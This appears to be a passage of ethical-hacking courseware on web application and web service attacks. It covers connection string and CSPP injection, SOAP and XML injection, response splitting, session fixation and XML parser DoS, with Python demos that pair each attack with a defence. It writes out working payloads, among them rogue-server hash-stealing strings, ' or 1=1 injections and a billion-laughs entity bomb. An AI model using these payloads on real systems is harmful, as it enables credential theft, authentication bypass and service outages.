A connection string injection attack can occur when dynamic string concatenation is used to build connection strings that are based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional keyword=value pair. The connection string is parsed using a "last one wins" algorithm, so the hostile input overrides the legitimate value configured earlier in the string. The connection string builder classes (SqlConnectionStringBuilder and its counterparts for the other data providers) are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs, an invalid pair throws an exception, and injected values are escaped so they remain inside the value they were supplied for.

Before injection

The common connection string connects to the Microsoft SQL Server database as follows:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

FIGURE 13.50: Before injection

After injection

Attackers can inject parameters simply by appending a semicolon (;) and another keyword=value pair to a value they control. This is the connection string injection technique in a delegated authentication environment, that is, one where the application opens the database connection with credentials the user supplies. In the following example, the user is asked for a user name and password that are concatenated into the connection string. The attacker enters the password as "pwd; Encryption=off", so the value is parsed as the password "pwd" followed by a separate Encryption keyword that turns encryption off for the connection. The resulting connection string becomes:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

FIGURE 13.51: After injection

When the connection string is populated, the Encryption value is added to the previously configured set of parameters; had an encryption setting already been present earlier in the string, the injected one, being last, would win.


Connection String Parameter Pollution (CSPP) Attacks

Connection string parameter pollution (CSPP) is used by attackers to steal password hashes and to hijack web credentials. CSPP specifically exploits semicolon-delimited database connection strings that are constructed dynamically from user input in web applications. In CSPP attacks, attackers append a second copy of a parameter whose value they control and, because the last occurrence wins, overwrite the parameter values in the connection string.

Hash Stealing

An attacker replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server connected to the Internet and running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Rogue_Server; Password=; Integrated Security=true;

Here the user ID field was filled with ";Data Source=Rogue_Server" and the password field with "; Integrated Security=true". The application then connects to Rogue_Server with the Windows credentials it is running under, and the attacker sniffs those Windows credentials (password hashes) from the authentication exchange.

Port Scanning

The attacker tries to connect to different ports by changing the port in the injected Data Source value (here 443) and observing the error messages obtained:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,443; Password=; Integrated Security=true;

Hijacking Web Credentials

The attacker tries to connect to the database using the web application's system account instead of a user-provided set of credentials:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;
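The following is an added example, not code from the CEH courseware or ADO.NET. It models the semicolon-delimited parser with the "last one wins" rule described in the Connection String Injection section, reproduces both that injection and the CSPP overrides above, and shows a builder that quotes values so a user-supplied field cannot add or override keywords (the approach the connection string builder classes take). The template is the slide's first connection string; Rogue_Server and the credentials are illustrative, and the page's Encryption keyword is used as written (the actual SqlClient keyword is Encrypt; the parsing effect is identical).

```python
"""Added example (not from the CEH courseware or ADO.NET): a model of how a
semicolon-delimited connection string is parsed, reproducing the injection and
CSPP overrides from the two sections above, and a builder that quotes values so
a user-supplied field cannot add or override keywords.  The strings are the
slide's; Rogue_Server and the credentials are illustrative."""

TEMPLATE = ("Data Source=Server,Port; Network Library=DBMSSOCN; "
            "Initial Catalog=DataBase; User ID={user}; Password={password};")


def concat_unsafe(user: str, password: str) -> str:
    """Vulnerable: raw concatenation of user-supplied fields into the template."""
    return TEMPLATE.format(user=user, password=password)


def parse_connection_string(conn: str) -> dict:
    """keyword=value pairs split on ';', keys case-insensitive.  A repeated key
    overwrites the earlier one ('last one wins').  A value wrapped in double
    quotes may contain ';' and is taken literally."""
    result, pos, n = {}, 0, len(conn)
    while pos < n:
        eq = conn.find("=", pos)
        if eq == -1:
            break
        key = conn[pos:eq].strip().lower()
        pos = eq + 1
        while pos < n and conn[pos] == " ":
            pos += 1
        if pos < n and conn[pos] == '"':
            end = conn.find('"', pos + 1)
            end = n if end == -1 else end
            value, pos = conn[pos + 1:end], end + 1
        else:
            end = conn.find(";", pos)
            end = n if end == -1 else end
            value, pos = conn[pos:end].strip(), end
        semi = conn.find(";", pos)              # skip to the next pair
        pos = n if semi == -1 else semi + 1
        if key:
            result[key] = value
    return result


def build_connection_string(**pairs) -> str:
    """Safe builder (same idea as SqlConnectionStringBuilder): keyword names are
    fixed by the caller, and any value containing ';' is quoted so the parser
    keeps it inside the intended keyword."""
    parts = []
    for key, value in pairs.items():
        text = str(value)
        if '"' in text:
            raise ValueError("double quote not supported by this builder")
        if ";" in text or text != text.strip():
            text = f'"{text}"'
        parts.append(f"{key.replace('_', ' ')}={text}")
    return ";".join(parts) + ";"


def demo() -> dict:
    """The page's injection, the hash-stealing CSPP, and the same inputs through the builder."""
    injection = parse_connection_string(concat_unsafe("Username", "pwd; Encryption=off"))
    cspp = parse_connection_string(
        concat_unsafe(";Data Source=Rogue_Server", "; Integrated Security=true"))
    safe = parse_connection_string(build_connection_string(
        data_source="Server,Port", user_id=";Data Source=Rogue_Server",
        password="pwd; Encryption=off"))
    return {"injection": injection, "cspp": cspp, "safe": safe}


if __name__ == "__main__":
    for name, parsed in demo().items():
        print(name, parsed)
```

The parser is deliberately minimal (real providers also accept single quotes and doubled quotes), but it is enough to see the mechanism: without quoting, a semicolon in any field ends the value and everything after it is parsed as new keywords, and a repeated Data Source or Integrated Security silently replaces the one the developer wrote.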


Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple copies of it simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users. Example: by default in ASP.NET (ADO.NET SqlClient), the maximum number of connections in the pool is 100 and the command timeout is 30 seconds. Thus, an attacker who runs 100 concurrent queries that each take 30 seconds or more to execute holds every pooled connection for that window, so that no one else is able to use the database-related parts of the application while the attack lasts; repeated continuously, it keeps the pool exhausted.


Web App Hacking Methodology

Attack Web App Client

Attacks on the client side reverse the usual direction: a malicious or compromised server-side application attacks the client-side application when the client interacts with it or processes the malicious data it returns. The attack occurs only once the client establishes a connection with the server; without that connection no malicious data reaches the client and there is no risk. Consider an example of a client-side attack in which an infected web page targets a specific browser weakness and exploits it successfully; as a result, the malicious server gains unauthorized control over the client system.


Attack Web App C lient


Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data. Attackers use various methods to perform the malicious attacks. The following are the malicious attacks performed by attackers to compromise client-side web applications: Cross-Site Scripting Redirection Attacks HTTP Header Injection Frame Injection Request Forgery Attacks Session Fixation Privacy Attacks ActiveX Attacks


Cross-Site Scripting

An attacker bypasses the client-side security mechanism (the browser's same-origin policy) by getting a vulnerable website to reflect or store attacker-supplied script, which then runs in the victim's browser with the access privileges of that site. These malicious scripts can read the user's session cookies and can even rewrite the HTML content of the website's pages.

Redirection Attacks

Attackers craft code and links so that they resemble the site the user wants to visit; when the user follows the link (for example one that abuses an unvalidated redirect parameter on the genuine site), the user is redirected to a malicious website where the attacker can obtain the user's credentials and other sensitive information.

HTTP Header Injection

When user-supplied data is copied into an HTTP response header without filtering carriage-return and line-feed characters, an attacker can inject additional headers and can even terminate the response and supply a second, attacker-controlled response (HTTP response splitting). This attack can deface websites, poison proxy and browser caches, and trigger cross-site scripting.
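The response-splitting described above, and the redirect validation that covers both it and the redirection attacks, written out as an added example (this is not code from the module; the redirect handler, the naive client model and the attacker payload are all constructed here):

```python
"""HTTP header injection (response splitting) and the validated redirect that stops it.

Added example, not code from the module. build_redirect_vulnerable() models a
redirect handler that copies a user-controlled value into the Location header;
split_responses() models a lenient client or proxy that starts a new response
at every line beginning with "HTTP/", which is exactly what response splitting
relies on. The attacker payload is constructed below.
"""
from __future__ import annotations

from urllib.parse import urlsplit

CRLF = "\r\n"


def build_redirect_vulnerable(target: str) -> bytes:
    """Copies the caller-supplied value straight into the Location header."""
    lines = ["HTTP/1.1 302 Found", "Location: " + target, "Content-Length: 0"]
    return (CRLF.join(lines) + CRLF + CRLF).encode("latin-1")


def build_redirect_safe(target: str) -> bytes:
    """Rejects header injection (CR, LF, NUL) and open redirects (any non-local target).

    The character check runs before urlsplit() on purpose: current Python
    versions silently strip \\r, \\n and \\t inside urlsplit(), which would hide
    the injection from the structural check. A backslash is rejected too,
    because browsers treat "/\\evil.example" like "//evil.example".
    """
    if any(ch in target for ch in "\r\n\x00\\"):
        raise ValueError("control characters in redirect target")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc or not target.startswith("/"):
        raise ValueError("redirect target must be a site-local path")
    return build_redirect_vulnerable(target)  # the value is now known to be a plain path


def split_responses(raw: bytes) -> list[dict[str, str]]:
    """Parse a byte stream the way a lenient HTTP client would.

    Returns one dict per response head: the status line under "status" and
    each header under its lower-cased name. Body lines are skipped until the
    next status line appears.
    """
    responses: list[dict[str, str]] = []
    current: dict[str, str] = {}
    in_head = False
    for line in raw.decode("latin-1").split(CRLF):
        if line.startswith("HTTP/"):
            current = {"status": line}
            responses.append(current)
            in_head = True
        elif in_head and line == "":
            in_head = False
        elif in_head and ":" in line:
            name, _, value = line.partition(":")
            current[name.strip().lower()] = value.strip()
    return responses


# Constructed attacker input for a redirect parameter: it completes the 302,
# then supplies a second, fully attacker-controlled 200 response with a script.
SPLIT_PAYLOAD = (
    "/home" + CRLF
    + "Content-Length: 0" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: 25" + CRLF + CRLF
    + "<script>alert(1)</script>"
)


def demo() -> tuple[int, str]:
    """(responses a lenient client sees from the vulnerable handler, reason the safe one refuses)."""
    seen = split_responses(build_redirect_vulnerable(SPLIT_PAYLOAD))
    try:
        build_redirect_safe(SPLIT_PAYLOAD)
        refusal = ""
    except ValueError as exc:
        refusal = str(exc)
    return len(seen), refusal


if __name__ == "__main__":
    print(demo())
```

Real servers and frameworks mostly refuse bare CR/LF in header values today, so in practice the same check matters most where an application writes headers itself or where an intermediary re-encodes the value; the path check is what stops the redirection attack on its own.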

Frame Injection

When scripts do not validate their input, the attacker can inject code through frames. This affects every browser and script that does not validate untrusted input. These vulnerabilities occur in HTML pages that use frames, and are made worse because web browsers allow one page to change the content or target of another page's frame.

Request Forgery Attack

In this attack, the attacker exploits the trust that a website or web application places in the user's browser. Because the browser automatically attaches the user's session cookie to every request for that site, the attack works by including on an attacker-controlled page a link, image or auto-submitting form that makes the browser send a state-changing request to a site where the user is already authenticated.

Session Fixation

Session fixation helps an attacker hijack a valid user session. The attacker first obtains a legitimate session ID from the server, then tricks the user into accessing the genuine web server with that known session ID (for example through a link that carries the ID). When the user authenticates, the server binds the authenticated session to the ID the attacker already knows, so the attacker hijacks the user-validated session simply by presenting that ID. The attack succeeds only when the application fails to issue a new session ID on login.
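The sequence above, played out against a session store that keeps the pre-login session ID and against one that rotates it, as an added example (this is not code from the module; the session store, the user table and the attack steps are constructed here):

```python
"""Session fixation: a login that keeps the pre-authentication session ID
versus one that rotates it.

Added example, not code from the module. The session store, the user table
and the attack sequence are constructed here; a real application keeps
salted password hashes and sets the cookie with HttpOnly, Secure and SameSite.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field

USERS = {"victim": "correct horse battery staple"}  # constructed credential


@dataclass
class Session:
    user: str | None = None
    data: dict = field(default_factory=dict)


class SessionStore:
    def __init__(self, rotate_on_login: bool) -> None:
        self.rotate_on_login = rotate_on_login
        self._sessions: dict[str, Session] = {}

    def start_session(self) -> str:
        """Issue a fresh, unauthenticated session ID; any visitor gets one."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session()
        return sid

    def login(self, sid: str, username: str, password: str) -> str:
        """Authenticate the session presented in the request; return the ID the client must use from now on."""
        expected = USERS.get(username)
        if expected is None or not hmac.compare_digest(expected, password):
            raise PermissionError("bad credentials")
        session = self._sessions.get(sid) or Session()
        if self.rotate_on_login:
            # Fix: the ID the client arrived with may have been chosen by an
            # attacker, so drop it and bind the authenticated state to a new one.
            self._sessions.pop(sid, None)
            sid = secrets.token_urlsafe(32)
        session.user = username
        self._sessions[sid] = session
        return sid

    def user_for(self, sid: str) -> str | None:
        session = self._sessions.get(sid)
        return session.user if session is not None else None


def run_fixation_attack(store: SessionStore) -> str | None:
    """Play out the attack described above; return whom the planted ID resolves to afterwards."""
    # 1. The attacker obtains a valid session ID simply by visiting the site.
    planted = store.start_session()
    # 2. The attacker fixes that ID in the victim's browser (a link carrying the
    #    ID, cookie injection from a sibling subdomain, XSS, ...), so the victim's
    #    login request presents the attacker's ID.
    victims_sid = store.login(planted, "victim", USERS["victim"])
    # 3. The victim carries on with victims_sid; the attacker replays the planted ID.
    assert store.user_for(victims_sid) == "victim"
    return store.user_for(planted)


if __name__ == "__main__":
    print("no rotation:", run_fixation_attack(SessionStore(rotate_on_login=False)))
    print("rotation:   ", run_fixation_attack(SessionStore(rotate_on_login=True)))
```

The rotating store also refuses to adopt an ID it never issued (a client-chosen ID simply gets a fresh Session object), which closes the variant where the server accepts any session ID presented in the URL or cookie.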

Privacy Attacks

A privacy attack is tracking performed with the help of a remote site, based on a leaked persistent browser state (for example cookies, cached resources or visited-link history).

ActiveX Attacks

The attacker lures the victim via email or a crafted link to a page that loads a vulnerable ActiveX control, so that a remote code execution flaw in the control becomes reachable. Successful exploitation gives the attacker the same access privileges as the logged-on user.



Web App Hacking Methodology: Attack Web Services

Web services are an easy target for an attacker, and a compromised web service causes serious security breaches. The different types of web service attacks and their consequences are explained on the following slides.




Web services work atop legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities to various attacks. Web services are made available to users through various mechanisms and can be attacked using many techniques; hence the possibility of vulnerabilities increases, and the attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons behind attacking web services, and the attacker chooses the attack according to the purpose. If the attacker's intention is to stop a web service from serving its intended users, the attacker can launch a denial-of-service attack by sending numerous requests. Various types of attacks used against web services are:

SOAP Injection
XML Injection
WSDL Probing Attacks
Information Leakage
Application Logic Attacks
Database Attacks
DoS Attacks


FIGURE 13.52: Attack Web Services (diagram grouping the attacks around a web service: SOAP injection and XML injection; WSDL probing attacks; information leakage and application logic attacks; database attacks and DoS attacks)



Web Services Probing Attacks


In the first step, the attacker captures the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks. The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML Schema, so that they can be submitted to the web service. The attacker uses these requests to include malicious content in SOAP requests and analyzes the resulting errors to gain a deeper understanding of potential security weaknesses.

The figure shows one probe against a product-lookup operation. The attacker injects an arbitrary character (') in the input field:

  <?xml version="1.0" encoding="UTF-8" standalone="no"?>
  <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
      xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://sfaustlap/ProductInfo/">
        <SOAPSDK4:name>'</SOAPSDK4:name>
        <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
        <SOAPSDK4:password>5648</SOAPSDK4:password>
      </SOAPSDK4:GetProductInformationByName>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>

The server throws an error, and the SOAP fault hands back the database driver's message, the fragment of the query the input landed in, and a stack trace naming the data-access classes:

  <?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <soap:Body>
      <soap:Fault>
        <faultcode>soap:Server</faultcode>
        <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request.
          ---> System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression
          'productname like ''' and providerid = '312-111-8543''.
          at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(Int32 hr)
          at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&amp; executeResult)
          at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object&amp; executeResult)
          at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object&amp; executeResult)
          at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
          at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
          at System.Data.OleDb.OleDbCommand.ExecuteReader()
          at ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password)
          at ProductInfo.ProductInfo.GetProductInformationByName(String name, String uid, String password)
          --- End of inner exception stack trace ---</faultstring>
        <detail />
      </soap:Fault>
    </soap:Body>
  </soap:Envelope>

FIGURE 13.53: Web Services Probing Attacks



Web Service Attacks: SOAP Injection


Simple Object Access Protocol (SOAP) is a lightweight XML-based protocol designed to exchange structured and typed information on the web. The Envelope element is always the root element of a SOAP message. The attacker injects malicious query strings into a user input field to bypass the web service's authentication mechanism and access the backend database: the value travels inside the SOAP body to the service, which concatenates it into a SQL statement. This attack works similarly to SQL injection attacks.

The figure shows the login form at http://juggyboy.com/ws/products.asmx submitted with the Username field set to % and the Password field set to ' or 1=1 or blah=1. The request the form produces:

  <?xml version="1.0" encoding="UTF-8" standalone="no"?>
  <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
      xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
        <SOAPSDK4:name>%</SOAPSDK4:name>
        <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
        <SOAPSDK4:password>' or 1=1 or blah=1</SOAPSDK4:password>
      </SOAPSDK4:GetProductInformationByName>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>

Server response: the injected condition makes the query's WHERE clause true, and the service returns product data without a valid password:

  <?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <soap:Body>
      <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
        <GetProductInformationByNameResult>
          <productId>25</productId>
          <productName>Painting101</productName>
          <productQuantity>3</productQuantity>
          <productPrice>1500</productPrice>
        </GetProductInformationByNameResult>
      </GetProductInformationByNameResponse>
    </soap:Body>
  </soap:Envelope>

FIGURE 13.54: SOAP Injection
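The probing step (Figure 13.53) and the injection step (Figure 13.54) share the same mechanics: build schema-valid requests from the WSDL, drop a probe into one field at a time, and read what the fault says. The added example below does that offline; it is not code from the module. The operation name, namespace and field names follow the products.asmx figures, and the two responses are constructed to mirror those figures so nothing is sent over the network.

```python
"""Probing a SOAP web service for SQL injection and reading what the fault leaks.

Added example, not code from the module. The operation, namespace and field
names follow the products.asmx figures; SAMPLE_FAULT and SAMPLE_OK are
constructed to mirror them and are parsed offline.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ET.register_namespace("soap", SOAP_ENV)

# Probe values in the order a tester tries them: first break the query, then bend it.
PROBES = ["'", '"', "' or 1=1 --", "' or 'a'='a", "%"]

# Fault-string fragments that identify the backend: the exception class name or
# the driver's canonical error text, each stable across versions.
DB_ERROR_SIGNATURES = {
    "System.Data.OleDb.OleDbException": "OLE DB (often Access/Jet behind ASP.NET)",
    "System.Data.SqlClient.SqlException": "Microsoft SQL Server",
    "You have an error in your SQL syntax": "MySQL",
    "syntax error at or near": "PostgreSQL",
    "ORA-": "Oracle",
}


def build_request(operation: str, namespace: str, fields: dict[str, str]) -> str:
    """Build a SOAP 1.1 request. Values go in as escaped text, so the probe
    reaches the service's SQL layer intact without breaking the XML."""
    ET.register_namespace("m", namespace)
    env = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_ENV}}}Body")
    op = ET.SubElement(body, f"{{{namespace}}}{operation}")
    for name, value in fields.items():
        ET.SubElement(op, f"{{{namespace}}}{name}").text = value
    return ET.tostring(env, encoding="unicode")


def probe_requests(operation: str, namespace: str, fields: dict[str, str]):
    """Yield (field, probe, envelope): every probe in every field, one field at a
    time, with the remaining fields kept at their known-good values."""
    for field in fields:
        for probe in PROBES:
            mutated = dict(fields, **{field: probe})
            yield field, probe, build_request(operation, namespace, mutated)


def classify_response(xml_text: str) -> dict[str, object]:
    """Report whether a response is a SOAP fault and whether it leaks a database error."""
    root = ET.fromstring(xml_text)
    fault = root.find(f".//{{{SOAP_ENV}}}Fault")
    if fault is None:
        return {"fault": False, "backend": None, "faultstring": None}
    # In SOAP 1.1, faultcode and faultstring are unqualified children of soap:Fault.
    text = fault.findtext("faultstring") or ""
    backend = next((db for sig, db in DB_ERROR_SIGNATURES.items() if sig in text), None)
    return {"fault": True, "backend": backend, "faultstring": text}


# Constructed fault modelled on Figure 13.53: a quote in the name field reached
# an OLE DB query unparameterised and the driver's message came back verbatim.
SAMPLE_FAULT = f"""<soap:Envelope xmlns:soap="{SOAP_ENV}">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---&gt; System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'productname like ''' and providerid = '312-111-8543''.</faultstring>
      <detail />
    </soap:Fault>
  </soap:Body>
</soap:Envelope>"""

# Constructed success response modelled on Figure 13.54.
SAMPLE_OK = f"""<soap:Envelope xmlns:soap="{SOAP_ENV}">
  <soap:Body>
    <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
      <GetProductInformationByNameResult>
        <productId>25</productId><productName>Painting101</productName>
        <productQuantity>3</productQuantity><productPrice>1500</productPrice>
      </GetProductInformationByNameResult>
    </GetProductInformationByNameResponse>
  </soap:Body>
</soap:Envelope>"""

if __name__ == "__main__":
    fields = {"name": "Painting101", "uid": "312-111-8543", "password": "5648"}
    for field, probe, env in probe_requests("GetProductInformationByName", "http://juggyboy/ProductInfo/", fields):
        print(field, repr(probe), len(env), "bytes")
    print(classify_response(SAMPLE_FAULT)["backend"])
```

The defensive reading of the same fault is the point of the probing slide: a service that returns the driver's exception text and query fragment to the caller has already told the attacker which dialect to write the injection in. Return a generic soap:Server fault and log the detail server-side; parameterize the query so the probe never changes its structure.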



Web Service Attacks: XML Injection


An XML injection attack is the process in which the attacker enters values that the application uses to build or query XML, chosen so that the values are interpreted as markup rather than as data. Attackers inject XML data and tags into user input fields to manipulate the XML structure or populate an XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
The figure shows the registration form at http://juggyboy.com/ws/login.asmx filled in with Username Mark, Password 12345 and, in the E-mail field, a value that closes the current record and opens a second one:

  mark@certifiedhacker.com</mail></user><user><username>Jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com

Server-side code: the users file after the request is processed. The injected markup is stored as structure, so a second account (Jason, userid 105) that was never registered now exists on the server:

  <?xml version="1.0" encoding="ISO-8859-1"?>
  <users>
    <user>
      <username>gandalf</username>
      <password>c3</password>
      <userid>101</userid>
      <mail>gandalf@middleearth.com</mail>
    </user>
    <user>
      <username>Mark</username>
      <password>12345</password>
      <userid>102</userid>
      <mail>mark@certifiedhacker.com</mail>
    </user>
    <user>
      <username>Jason</username>
      <password>attack</password>
      <userid>105</userid>
      <mail>jason@juggyboy.com</mail>
    </user>
  </users>

Creates a new user account on the server.

FIGURE 13.55: XML Injection
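The registration from Figure 13.55 reproduced both ways, as an added example that is not code from the module: the record built by string formatting turns the E-mail value into a second user, while the record built through the XML API stores the same value as text. The users file and the injected value are constructed to match the figure.

```python
"""XML injection into a users file: string concatenation versus a proper XML builder.

Added example, not code from the module. USERS_XML and REGISTRATION are
constructed to match Figure 13.55 (the XML declaration is omitted so the
document can be parsed directly from a str).
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

# Constructed: the users file before the registration is processed.
USERS_XML = """<users>
  <user><username>gandalf</username><password>c3</password><userid>101</userid><mail>gandalf@middleearth.com</mail></user>
</users>"""

# Constructed form submission. Only the mail field is hostile: it closes
# <mail> and <user>, then opens a second <user> record that the template's
# own closing tags will seal.
REGISTRATION = {
    "username": "Mark",
    "password": "12345",
    "userid": "102",
    "mail": ("mark@certifiedhacker.com</mail></user>"
             "<user><username>Jason</username><password>attack</password>"
             "<userid>105</userid><mail>jason@juggyboy.com"),
}


def add_user_vulnerable(users_xml: str, reg: dict[str, str]) -> str:
    """Builds the record by string formatting: whatever the client sends is markup."""
    record = (
        "<user><username>{username}</username><password>{password}</password>"
        "<userid>{userid}</userid><mail>{mail}</mail></user>"
    ).format(**reg)
    return users_xml.replace("</users>", record + "\n</users>")


def add_user_safe(users_xml: str, reg: dict[str, str]) -> str:
    """Builds the record through the XML API: text is escaped on serialisation,
    so it can never become an element. Unexpected field names are rejected."""
    allowed = ("username", "password", "userid", "mail")
    if set(reg) != set(allowed):
        raise ValueError("unexpected registration fields")
    root = ET.fromstring(users_xml)
    user = ET.SubElement(root, "user")
    for name in allowed:
        ET.SubElement(user, name).text = reg[name]
    return ET.tostring(root, encoding="unicode")


def user_summary(users_xml: str) -> list[tuple[str, str, str]]:
    """(username, userid, mail) for every <user>, as the application would read them back."""
    root = ET.fromstring(users_xml)
    return [(u.findtext("username"), u.findtext("userid"), u.findtext("mail"))
            for u in root.findall("user")]


if __name__ == "__main__":
    print("vulnerable:", user_summary(add_user_vulnerable(USERS_XML, REGISTRATION)))
    print("safe:      ", user_summary(add_user_safe(USERS_XML, REGISTRATION)))
```

The safe builder still stores the hostile string (as a mail address it is nonsense, so a format check on the field would also be appropriate), but it stays inside one text node; the forged Jason record never comes into being.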



Web Services Parsing Attacks


Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service condition or to generate logical errors in web service request processing. The payload is well-formed, so a service that only validates against the schema after parsing is already too late.

Recursive Payloads: XML can easily nest or arrange elements within a single document to express complex relationships. An attacker queries the web service with a grammatically correct SOAP document whose elements are nested so deeply, or whose entities expand so many times, that processing it exhausts the XML parser and the CPU.

Oversize Payloads: XML is relatively verbose, and potentially large documents must always be considered when protecting the infrastructure, so programmers should limit the document size. Attackers send a payload that is excessively large to consume all system resources, rendering web services inaccessible to other legitimate users.
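A pre-parse guard that enforces a size ceiling, a nesting ceiling and a ban on DTDs before the document reaches the application's parser, as an added example (this is not code from the module; the limits and the three payloads are constructed here). It uses the streaming expat parser from the standard library so the check itself cannot be made to allocate a tree.

```python
"""Pre-parse guard against recursive and oversize XML payloads.

Added example, not code from the module. The document is streamed once
through expat with a byte ceiling, a depth ceiling and a DOCTYPE ban;
only if it passes should it be handed to the real parser. The limits are
illustrative; set them from the largest legitimate message you expect.
"""
from __future__ import annotations

from xml.parsers import expat


class XmlRejected(ValueError):
    """Raised when a document violates a guard limit."""


def check_xml(data: bytes, max_bytes: int = 1_000_000, max_depth: int = 64) -> dict[str, int]:
    """Return {"elements": n, "max_depth": d} for an acceptable document, else raise XmlRejected."""
    if len(data) > max_bytes:
        raise XmlRejected(f"document is {len(data)} bytes, limit {max_bytes}")

    stats = {"elements": 0, "max_depth": 0}
    depth = 0

    def start(name, attrs):
        nonlocal depth
        depth += 1
        stats["elements"] += 1
        if depth > max_depth:
            # An exception raised in an expat handler propagates out of Parse().
            raise XmlRejected(f"nesting depth exceeds {max_depth}")
        stats["max_depth"] = max(stats["max_depth"], depth)

    def end(name):
        nonlocal depth
        depth -= 1

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # A DTD is the vehicle for entity expansion (billion laughs) and external
        # entity payloads; a SOAP or REST endpoint has no reason to accept one.
        raise XmlRejected("DOCTYPE declarations are not accepted")

    parser = expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.StartDoctypeDeclHandler = reject_doctype
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise XmlRejected(f"malformed XML: {exc}") from exc
    return stats


# Constructed payloads for the three cases discussed above.
RECURSIVE = b"<a>" * 10_000 + b"</a>" * 10_000
BILLION_LAUGHS = (
    b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
    b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
    b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
    b"]><lolz>&lol3;</lolz>"
)
BENIGN = (
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    b"<soap:Body><GetProduct><name>Painting101</name></GetProduct></soap:Body></soap:Envelope>"
)

if __name__ == "__main__":
    for label, payload in (("benign", BENIGN), ("recursive", RECURSIVE), ("billion laughs", BILLION_LAUGHS)):
        try:
            print(label, check_xml(payload))
        except XmlRejected as exc:
            print(label, "rejected:", exc)
```

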